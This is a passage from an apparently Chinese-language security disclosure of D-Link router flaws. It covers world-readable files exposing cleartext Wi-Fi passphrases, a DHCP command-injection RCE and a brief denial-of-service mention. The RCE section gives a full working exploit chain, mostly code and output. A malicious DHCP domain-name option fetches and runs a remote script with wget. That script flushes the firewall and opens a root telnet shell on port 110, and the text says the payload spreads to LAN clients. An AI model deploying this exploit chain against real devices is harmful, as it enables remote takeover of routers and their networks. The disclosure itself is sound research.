/var/run/hostapd*文件包含了cleartext中的无线密码,这些文件的权限为-rw-rw-rw-(666)

# ls -la /var/run/hostapd*
-rw-rw-rw-    1 root     root           73 Jan  1 00:00 /var/run/hostapd-wlan1wps.eap_user
-rw-rw-rw-    1 root     root         1160 Jan  1 00:00 /var/run/hostapd-wlan1.conf
-rw-rw-rw-    1 root     root           73 Jan  1 00:00 /var/run/hostapd-wlan0wps.eap_user
-rw-rw-rw-    1 root     root         1170 Jan  1 00:00 /var/run/hostapd-wlan0.conf
# cat /var/run/hostapd*|grep -i pass
wpa_passphrase=aaaaa00000
wpa_passphrase=aaaaa00000

九、RCE漏洞

在路由器上运行的DHCP客户端容易受到几个命令注入的影响。

请使用dhcpd.conf文件提供以下配置:

rasp-pwn-dlink# cat /etc/dhcp/dhcpd.conf
option domain-name ";wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;";
option domain-name-servers 8.8.8.8, 8.8.4.4;
default-lease-time 600;
max-lease-time 7200;
ddns-update-style none;
subnet 10.254.239.0 netmask 255.255.255.224 {
  range 10.254.239.10 10.254.239.20;
  option routers 10.254.239.1;
}
rasp-pwn-dlink# ifconfig eth1
eth1      Link encap:Ethernet  HWaddr 00:0e:c6:aa:aa:aa  
          inet addr:10.254.239.1  Bcast:10.254.239.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:caaa:aaaa:aaa/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:129 errors:0 dropped:0 overruns:0 frame:0
          TX packets:107 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11181 (10.9 KiB)  TX bytes:49155 (48.0 KiB)

rasp-pwn-dlink# cat /var/www/html/dhcp-rce 
#!/bin/sh

wget -O /var/telnetd-dhcpd-wan http://10.254.239.1/dlink-telnetd
chmod 777 /var/telnetd-dhcpd-wan
(for i in 0 1 2 3; do # win races against legit iptables rules
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
sleep 10
done ) &

/var/telnetd-dhcpd-wan -l /bin/sh -p 110 &

rasp-pwn-dlink# dhcpd eth1
Internet Systems Consortium DHCP Server 4.3.1
Copyright 2004-2014 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 1 leases to leases file.
Listening on LPF/eth1/00:0e:c6:aa:aa:aa/10.254.239.0/27
Sending on   LPF/eth1/00:0e:c6:aa:aa:aa/10.254.239.0/27
Sending on   Socket/fallback/fallback-net
rasp-pwn-dlink#

当在启动时做DHCP请求时,路由器连接到远程HTTP服务器的WAN:

rasp-pwn-dlink# tail -f /var/log/nginx/access.log
10.254.239.10 - - [03/Jul/2017:15:40:30 +0000] "GET /dhcp-rce HTTP/1.1" 200 383 "-" "Wget"
10.254.239.10 - - [03/Jul/2017:15:40:30 +0000] "GET /dlink-telnetd HTTP/1.1" 200 10520 "-" "Wget"
10.254.239.10 - - [03/Jul/2017:15:40:30 +0000] "GET /dhcp-rce HTTP/1.1" 200 383 "-" "Wget"
10.254.239.10 - - [03/Jul/2017:15:40:30 +0000] "GET /dlink-telnetd HTTP/1.1" 200 10520 "-" "Wget"

现在皮埃尔得到了一个来自WAN的telnetd:

rasp-pwn-dlink# telnet 10.254.239.10 110
Trying 10.254.239.10...
Connected to 10.254.239.10.
Escape character is '^]'.


BusyBox v1.14.1 (2017-01-20 14:35:27 CST) built-in shell (msh)
Enter 'help' for a list of built-in commands.

# uname -ap
Linux dlinkrouter 2.6.30.9 #1 Fri Jan 20 14:12:50 CST 2017 rlx GNU/Linux
# cd /var
# ls -la
drwxr-xr-x    5 root     root            0 Jan  1 00:00 etc
drwxr-xr-x    2 root     root            0 Jan  1  1970 log
drwxr-xr-x    3 root     root            0 Jan  1 00:00 run
drwxr-xr-x    2 root     root            0 Jan  1  1970 sealpac
drwxr-xr-x    4 root     root            0 Jan  1 00:00 tmp
drwxr-xr-x    2 root     root            0 Jan  1  1970 dnrd
drwxr-xr-x    4 root     root            0 Jan  1  1970 htdocs
-rw-r--r--    1 root     root           10 Jan  1  1970 TZ
drwxr-xr-x    2 root     root            0 Jan  1 00:00 servd
-rw-r--r--    1 root     root         5588 Jan  1  1970 default_wifi.xml
-rw-rw-rw-    1 root     root           28 Jan  1 00:00 passwd
drwxrwx---    2 root     root            0 Jan  1 00:00 session
srwxr-xr-x    1 root     root            0 Jan  1 00:00 gpio_ctrl
-rw-r--r--    1 root     root            2 Jan  1 00:00 sys_op
drwxr-xr-x    2 root     root            0 Jan  1 00:00 home
lrwxrwxrwx    1 root     root           16 Jan  1 00:00 portal_share -> /var/tmp/storage
drwxr-xr-x    3 root     root            0 Jan  1 00:00 proc
-rwxr-xr-x    1 root     root          856 Jan  1 00:00 killrc0
drwxr-xr-x    2 root     root            0 Jan  1 00:00 porttrigger
-rw-r--r--    1 root     root          383 Jan  1 00:00 re
-rwxrwxrwx    1 root     root        10520 Jan  1 00:00 telnetd-dhcpd-wan
-rw-rw-rw-    1 root     root          301 Jan  1 00:00 rendezvous.conf
-rw-rw-rw-    1 root     root          523 Jan  1 00:00 stunnel.conf
-rw-rw-rw-    1 root     root          282 Jan  1 00:00 topology.conf
-rw-rw-rw-    1 root     root          394 Jan  1 00:00 lld2d.conf
-rw-r--r--    1 root     root          199 Jan  1 00:00 hosts
drwxr-xr-x   16 root     root          241 Jan 20  2017 ..
drwxr-xr-x   14 root     root            0 Jan  1 00:00 .
# cat re
#!/bin/sh

wget -O /var/telnetd-dhcpd-wan http://10.254.239.1/dlink-telnetd
chmod 777 /var/telnetd-dhcpd-wan
(for i in 0 1 2 3; do # win races against legit iptables rules
iptables -F        
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
sleep 10 
done ) &
/var/telnetd-dhcpd-wan -l /bin/sh -p 110 &

#

这个telnetd访问可以从WAN和LAN访问。

漏洞分析

涉及几个WAN RCE漏洞。第一个漏洞是:

/etc/services/INET/inet_ipv4.php

94         $udhcpc_helper  = "/var/servd/".$inf."-udhcpc.sh";

你可以在任何地方都实施命令注入:

 99     fwrite(w,$udhcpc_helper, 
100                 '#!/bin/sh\n'.
101                 'echo [$0]: $1 $interface $ip $subnet $router $lease $domain $scope $winstype $wins $sixrd_prefix $sixrd_prefixlen $sixrd_msklen $sixrd_bripaddr ... > /dev/console\n'.
102                 'phpsh '.$hlper.' ACTION=$1'.
103                         ' INF='.$inf.
104                         ' INET='.$inet.
105                         ' MTU='.$mtu.
106                         ' INTERFACE=$interface'.
107                         ' IP=$ip'.
108                         ' SUBNET=$subnet'.
109                         ' BROADCAST=$broadcast'.
110                         ' LEASE=$lease'.
111                         ' "DOMAIN=$domain"'.
112                         ' "ROUTER=$router"'.
113                         ' "DNS='.$dns.'$dns"'.
114                         ' "CLSSTROUT=$clsstrout"'.
115                         ' "MSCLSSTROUT=$msclsstrout"'.
116                         ' "SSTROUT=$sstrout"'.
117                         ' "SCOPE=$scope"'.
118                         ' "WINSTYPE=$winstype"'.
119                         ' "WINS=$wins"'.
120                         ' "SIXRDPFX=$sixrd_prefix"'.
121                         ' "SIXRDPLEN=$sixrd_prefixlen"'.
122                         ' "SIXRDMSKLEN=$sixrd_msklen"'.
123                         ' "SIXRDBRIP=$sixrd_bripaddr"'.
124                         ' "SDEST=$sdest"'.
125                         ' "SSUBNET=$ssubnet"'.
126                         ' "SROUTER=$srouter"\n'.
127                 'exit 0\n'
128                 );

正如你所看到的,变量没有被清理过。一种解决方案是使用具有$domain(isc-dhcp中的option domain-name)的注入命令—— /var/servd/$VAR-udhcpc.sh。使用的sh脚本。

将生成WAN-1-udhcpc.sh文件,并由udhcpc(udhcpc -i eth1 -H dlinkrouter -p /var/servd/WAN-1-udhcpc.pid -s /var/servd/WAN-1-udhcpc.sh)调用。

# cat WAN-1-udhcpc.sh
#!/bin/sh
echo [$0]: $1 $interface $ip $subnet $router $lease $domain $scope $winstype $wins $sixrd_prefix $sixrd_prefixlen $sixrd_msklen $sixrd_bripaddr ... > /dev/console
phpsh /etc/services/INET/inet4_dhcpc_helper.php ACTION=$1 INF=WAN-1 INET=INET-3 MTU=1500 INTERFACE=$interface IP=$ip SUBNET=$subnet BROADCAST=$broadcast LEASE=$lease "DOMAIN=$domain" "ROUTER=$router" "DNS=$dns" "CLSSTROUT=$clsstrout" "MSCLSSTROUT=$msclsstrout" "SSTROUT=$sstrout" "SCOPE=$scope" "WINSTYPE=$winstype" "WINS=$wins" "SIXRDPFX=$sixrd_prefix" "SIXRDPLEN=$sixrd_prefixlen" "SIXRDMSKLEN=$sixrd_msklen" "SIXRDBRIP=$sixrd_bripaddr" "SDEST=$sdest" "SSUBNET=$ssubnet" "SROUTER=$srouter"
exit 0

因此,使用这个DNS配置将对路由器起作用:

option domain-name "`wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;`";

在日志中,皮埃尔确认执行:

rasp-pwn-dlink# tail -f /var/log/nginx/access.log
10.254.239.10 - - [03/Jul/2017:15:42:31 +0000] "GET /dhcp-rce HTTP/1.1" 200 383 "-" "Wget"
10.254.239.10 - - [03/Jul/2017:15:42:31 +0000] "GET /dlink-telnetd HTTP/1.1" 200 10520 "-" "Wget"

注意,你还在一些生成的文件(在/var/servd/)中使用;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;有效载荷:

# cat /var/servd/DHCPS4.LAN-1_start.sh
#!/bin/sh
rm -f /var/servd/LAN-1-udhcpd.lease
xmldbc -X /runtime/inf:1/dhcps4/leases
xmldbc -s /runtime/inf:1/dhcps4/pool/start 192.168.0.100
xmldbc -s /runtime/inf:1/dhcps4/pool/end 192.168.0.199
xmldbc -s /runtime/inf:1/dhcps4/pool/leasetime 604800
xmldbc -s /runtime/inf:1/dhcps4/pool/network 192.168.0.1
xmldbc -s /runtime/inf:1/dhcps4/pool/mask 24
xmldbc -s /runtime/inf:1/dhcps4/pool/domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re; <--- command injection
xmldbc -s /runtime/inf:1/dhcps4/pool/router 192.168.0.1
event UPDATELEASES.LAN-1 add "@/etc/events/UPDATELEASES.sh LAN-1 /var/servd/LAN-1-udhcpd.lease"
udhcpd /var/servd/LAN-1-udhcpd.conf &
exit 0
exit 0
#

# cat /var/servd/DHCPS4.LAN-2_start.sh
#!/bin/sh
rm -f /var/servd/LAN-2-udhcpd.lease
xmldbc -X /runtime/inf:2/dhcps4/leases
xmldbc -s /runtime/inf:2/dhcps4/pool/start 192.168.7.100
xmldbc -s /runtime/inf:2/dhcps4/pool/end 192.168.7.199
xmldbc -s /runtime/inf:2/dhcps4/pool/leasetime 604800
xmldbc -s /runtime/inf:2/dhcps4/pool/network 192.168.7.1
xmldbc -s /runtime/inf:2/dhcps4/pool/mask 24
xmldbc -s /runtime/inf:2/dhcps4/pool/domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re; <--- command injection
xmldbc -s /runtime/inf:2/dhcps4/pool/router 192.168.7.1
event UPDATELEASES.LAN-2 add "@/etc/events/UPDATELEASES.sh LAN-2 /var/servd/LAN-2-udhcpd.lease"
udhcpd /var/servd/LAN-2-udhcpd.conf &
exit 0
exit 0
#

此攻击将通过在路由器内运行的dhcp服务器传递给内部客户端,因此,如果你将一个脆弱的Dlink路由器连接到内部网络,它也会被pwned:

# ps -w|grep dhcpd
 6543 root       984 S    udhcpd /var/servd/LAN-1-udhcpd.conf 
 6595 root       984 S    udhcpd /var/servd/LAN-2-udhcpd.conf

/runtime/inf:{1,2}/dhcps4/pool/domain入口点位于/var/servd/LAN-{1,2}-udhcpd.conf文件,而该文件包含流氓域值(rogue domain value):

# cat /var/servd/LAN-1-udhcpd.conf
remaining no
start 192.168.0.100
end 192.168.0.199
interface br0
lease_file /var/servd/LAN-1-udhcpd.lease
pidfile /var/servd/LAN-1-udhcpd.pid
force_bcast no
opt subnet 255.255.255.0
opt domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re;

^^^^^^^^^^^^ this domain will be provided to clients connected on the LAN,
             possibly infecting other dlink routers \o/

opt router 192.168.0.1
opt dns 192.168.0.1
opt lease 604800
dhcp_helper event UPDATELEASES.LAN-1
# cat /var/servd/LAN-2-udhcpd.conf
remaining no
start 192.168.7.100
end 192.168.7.199
interface br1
lease_file /var/servd/LAN-2-udhcpd.lease
pidfile /var/servd/LAN-2-udhcpd.pid
force_bcast no
opt subnet 255.255.255.0
opt domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ; sh /var/re

^^^^^^^^^^^^ this domain will be provided to clients connected on the LAN,
             possibly infecting other dlink routers \o/

opt router 192.168.7.1
opt dns 192.168.7.1
opt lease 604800
dhcp_helper event UPDATELEASES.LAN-2
#

十、DDoS漏洞

该漏洞出现在路由器(revA和revB)中运行的一些守护进程可以从LAN远程崩溃,由于它不向黑客提供进一步的远程特权,因此目前还没有详细的分析。

最后

对这10个严重漏洞,D-Link尚未做出回应,并且目前尚不清楚D-Link是否会承认这些漏洞的存在,以及是否打算修复这些漏洞。

源链接

Hacking more

...